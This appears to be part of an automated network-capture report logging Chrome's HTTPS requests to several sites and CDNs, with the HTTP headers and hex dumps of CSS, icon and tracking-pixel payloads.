                                                                                                                                                          2024-06-09 22:40:50 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 32 33 3a 35 37 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:23:57 GMT
                                                                                                                                                          2024-06-09 22:40:50 UTC25INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: image/png
                                                                                                                                                          2024-06-09 22:40:50 UTC46INData Raw: 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 32 30 20 53 65 70 20 32 30 31 39 20 30 38 3a 33 35 3a 32 37 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                                                                                                                                          2024-06-09 22:40:50 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:50 UTC29INData Raw: 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a
                                                                                                                                                          Data Ascii: X-Frame-Options: SAMEORIGIN
                                                                                                                                                          2024-06-09 22:40:50 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 31 30 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 32 33 3a 35 37 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Expires: Mon, 10 Jun 2024 22:23:57 GMT
                                                                                                                                                          2024-06-09 22:40:50 UTC30INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 38 36 34 30 30 0d 0a
                                                                                                                                                          Data Ascii: Cache-Control: max-age=86400
                                                                                                                                                          2024-06-09 22:40:50 UTC14INData Raw: 58 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: HIT


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          102192.168.2.549841183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:50 UTC599OUTGET /ftl/commonPage/themes/hongbao.css HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://brhrjf.yuhu06.xyz/ftl/commonPage/themes/gui-base.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:50 UTC677INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 5666
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-24-15
                                                                                                                                                          ETag: W/"64252e4f-d530"
                                                                                                                                                          Date: Fri, 07 Jun 2024 11:12:18 GMT
                                                                                                                                                          Last-Modified: Thu, 30 Mar 2023 06:38:07 GMT
                                                                                                                                                          Expires: Sun, 07 Jul 2024 11:12:18 GMT
                                                                                                                                                          Age: 214112
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;xymp24:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-XY-MP-24-15
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-01
                                                                                                                                                          X-Cdn-Request-ID: ea59ca15c3d95356ff5b1195c2ef8546
                                                                                                                                                          2024-06-09 22:40:50 UTC5666INData Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5d 7b 8f dc d6 75 ff df 9f 82 85 61 44 16 c4 59 92 b3 b3 4f a4 30 92 d8 a8 5b 20 30 da f4 81 fe b3 e0 ce 70 76 18 71 87 83 19 ae 56 6b 41 40 d2 d8 75 ad 2a 51 9b 36 51 9a c4 68 15 c4 8a 9a c2 8f c2 8e 65 2b 86 fd 65 34 fb f8 16 bd 7c 9f 4b de 7b 79 cf bd 77 bc 56 25 41 da 99 e1 f0 fc ce fb 9c 1f 39 a3 b5 ab af 7d fb e2 e1 cf 2f 1e fc 61 f9 f9 67 67 bf bf bf fc ec cb e5 bf de 39 fd af c7 cb cf ef d9 fb c1 41 38 bd ba f6 5c 6f 18 1f da fe e8 46 30 4f c2 45 70 18 4c 13 fb 78 ee cf 7a 91 7f 72 14 da e4 ef 60 6e dd b2 f6 fd e1 f5 83 79 7c 34 1d d9 c3 38 8a e7 3b d6 f3 e3 f1 d8 fa 93 f0 70 16 cf 13 7f 9a ec 5a b7 a5 4e 05 1f d8 8b 20 39 0e a7 f4 73 c3 28 5e 04 a9 c4 78 3e 4a 1f 16 d2 bc 51 fa 7b d7 6a 3e 66 49 25 ef 1e 85 8b 19
                                                                                                                                                          Data Ascii: ]{uaDYO0[ 0pvqVkA@u*Q6Qhe+e4|K{ywV%A9}/agg9A8\oF0OEpLxzr`ny|48;pZN 9s(^x>JQ{j>fI%


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          103192.168.2.549837202.61.87.2244434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:50 UTC593OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                          Host: xpj723.cc
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: com_env=p
                                                                                                                                                          2024-06-09 22:40:50 UTC360INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:50 GMT
                                                                                                                                                          Content-Type: image/x-icon
                                                                                                                                                          Content-Length: 140
                                                                                                                                                          Connection: close
                                                                                                                                                          Last-Modified: Wed, 27 Jun 2018 09:11:10 GMT
                                                                                                                                                          ETag: "5b3354ae-8c"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: EXPIRED
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:50 UTC140INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 00 2e 49 44 41 54 78 da ec ce 31 01 00 00 08 03 a0 69 ff ce 33 86 0f 24 60 da e6 d3 e6 99 80 80 80 80 80 80 80 80 80 80 80 80 80 80 c0 09 30 00 40 b4 03 3d e3 0a 67 49 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR szztEXtSoftwareAdobe ImageReadyqe<.IDATx1i3$`0@=gIIENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          104192.168.2.54983938.174.148.2344434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:50 UTC731OUTGET /?__CBK=394cc31f8c309f483229bca9f91b9e5621717972847_12137297 HTTP/1.1
                                                                                                                                                          Host: e933002.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:50 UTC20INHTTP/1.1 302 Found
                                                                                                                                                          2024-06-09 22:40:50 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:40:50 UTC19INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a
                                                                                                                                                          Data Ascii: Content-Length: 0
                                                                                                                                                          2024-06-09 22:40:50 UTC13INData Raw: 4c 6f 63 61 74 69 6f 6e 3a 20 2f 0d 0a
                                                                                                                                                          Data Ascii: Location: /
                                                                                                                                                          2024-06-09 22:40:50 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          105192.168.2.54983838.174.148.2344434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:50 UTC672OUTGET / HTTP/1.1
                                                                                                                                                          Host: e933002.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:51 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:40:51 UTC44INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 32 35 39 32 30 30 30 0d 0a
                                                                                                                                                          Data Ascii: Strict-Transport-Security: max-age=2592000
                                                                                                                                                          2024-06-09 22:40:51 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 30 3a 35 31 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:40:51 GMT
                                                                                                                                                          2024-06-09 22:40:51 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/html; charset=utf-8
                                                                                                                                                          2024-06-09 22:40:51 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:40:51 UTC24INData Raw: 58 2d 68 74 6d 6c 2d 63 61 63 68 65 3a 20 48 49 54 2d 33 36 30 30 0d 0a
                                                                                                                                                          Data Ascii: X-html-cache: HIT-3600
                                                                                                                                                          2024-06-09 22:40:51 UTC29INData Raw: 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a
                                                                                                                                                          Data Ascii: X-Frame-Options: SAMEORIGIN
                                                                                                                                                          2024-06-09 22:40:51 UTC9INData Raw: 75 75 69 64 3a 20 2d 0d 0a
                                                                                                                                                          Data Ascii: uuid: -
                                                                                                                                                          2024-06-09 22:40:51 UTC25INData Raw: 6f 75 74 2d 6c 69 6e 65 3a 20 67 62 2d 73 6f 75 72 63 65 2d 31 34 30 0d 0a
                                                                                                                                                          Data Ascii: out-line: gb-source-140
                                                                                                                                                          2024-06-09 22:40:51 UTC36INData Raw: 58 2d 43 61 63 68 65 3a 20 4d 49 53 53 20 66 72 6f 6d 20 63 64 6e 2d 53 74 61 72 6c 69 6e 6b 2d 4b 52 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: MISS from cdn-Starlink-KR
                                                                                                                                                          2024-06-09 22:40:51 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                                                                                                                          Data Ascii: Transfer-Encoding: chunked


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          106192.168.2.549842163.181.92.2434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:51 UTC561OUTGET /ocs/cc.png?1717972848771 HTTP/1.1
                                                                                                                                                          Host: ocsapi1961.hydqef.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://xpj723.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:51 UTC420INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 332
                                                                                                                                                          Connection: close
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:51 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Via: cache22.l2hk3[5,0], cache18.l2sg3[39,0], ens-cache10.de5[208,0]
                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                          EagleId: a3b55c9e17179728513312894e
                                                                                                                                                          2024-06-09 22:40:51 UTC332INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff c0 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93
                                                                                                                                                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          107192.168.2.54984490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:51 UTC549OUTGET /cc.png?r=7134333617 HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://hg679.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:51 UTC606INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:51 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[463],EU-GER-frankfurt-EDGE5-CACHE6[302,TCP_MISS,463],EU-FRA-paris-GLOBAL1-CACHE16[293],EU-FRA-paris-GLOBAL1-CACHE6[289,TCP_MISS,291],1.1 google
                                                                                                                                                          X-CCDN-Origin-Time: 276
                                                                                                                                                          x-hcs-proxy-type: 0
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 312a807ff0bf58f53fdd2428038548bc
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:51 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          108192.168.2.549845183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:51 UTC601OUTGET /ftl/commonPage/themes/gui-layer.css HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://brhrjf.yuhu06.xyz/ftl/commonPage/themes/gui-base.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:51 UTC689INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 6923
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-CHANGZ-MP-01-05
                                                                                                                                                          ETag: W/"64ddd5e1-c760"
                                                                                                                                                          Date: Fri, 07 Jun 2024 11:12:19 GMT
                                                                                                                                                          Last-Modified: Thu, 17 Aug 2023 08:10:09 GMT
                                                                                                                                                          Expires: Sun, 07 Jul 2024 11:12:19 GMT
                                                                                                                                                          Age: 214112
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;changzmp01:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-CHANGZ-MP-01-05
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-09
                                                                                                                                                          X-Cdn-Request-ID: fa4e4fc9d9b9bd446c84a3b703d567b6
                                                                                                                                                          2024-06-09 22:40:51 UTC6923INData Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5d 7b 8f 23 c7 71 ff 5f 9f 62 b2 82 e0 3b eb 86 37 1c 92 bb cb 25 64 24 b6 7c 96 1c 2b 09 22 29 7e c1 20 86 64 93 1c 2d 39 43 cd 0c 6f 6f 45 08 f0 de 29 88 6c 39 b1 13 e4 22 cb b0 0d 39 39 c5 71 12 01 c2 39 81 57 51 f2 97 85 7c 8e 35 36 96 60 e9 f2 1d d2 8f e9 99 7e ce 8b 33 7b 7b 11 4f 77 f3 ec aa ae ae ae ae fa 75 75 cf ef 8f e7 4e 10 82 c8 d8 79 f1 85 1b e6 fe ce e0 b1 d6 c2 39 5e bb 26 fc 1b 04 c6 c6 18 fb 0b 3f 38 30 1e ef 74 3a 03 63 ea 7b 91 19 ba af 80 03 a3 dd 5d dd 1a 18 23 67 7c 38 0b fc b5 37 31 e3 07 a3 c0 f1 c2 95 13 00 2f 32 7e cf 5d ae fc 20 72 bc 68 60 bc ca 17 cc 9e 98 a3 c8 83 94 56 ce 64 e2 7a b3 03 c3 32 da bd d5 2d c3 b6 78 0a 90 89 e9 74 0a af f8 c1 04 bd e4 47 91 bf 34 17 60 1a 99 81 33 71 d7 e1 81
                                                                                                                                                          Data Ascii: ]{#q_b;7%d$|+")~ d-9CooE)l9"99q9WQ|56`~3{{OwuuNy9^&?80t:c{]#g|871/2~] rh`Vdz2-xtG4`3q


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          109192.168.2.549846183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:51 UTC557OUTGET /ftl/commonPage/js/jquery/jquery-1.11.3.min.js HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:51 UTC710INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 95956
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-YANC-MP-16-19
                                                                                                                                                          ETag: "5d848f4f-176d4"
                                                                                                                                                          Date: Thu, 06 Jun 2024 12:04:40 GMT
                                                                                                                                                          Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 12:04:40 GMT
                                                                                                                                                          Age: 297371
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;yancmp16:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-YANC-MP-16-19
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-05
                                                                                                                                                          X-Cdn-Request-ID: 423073fef5f0a48f120a7f28e0e6eb80
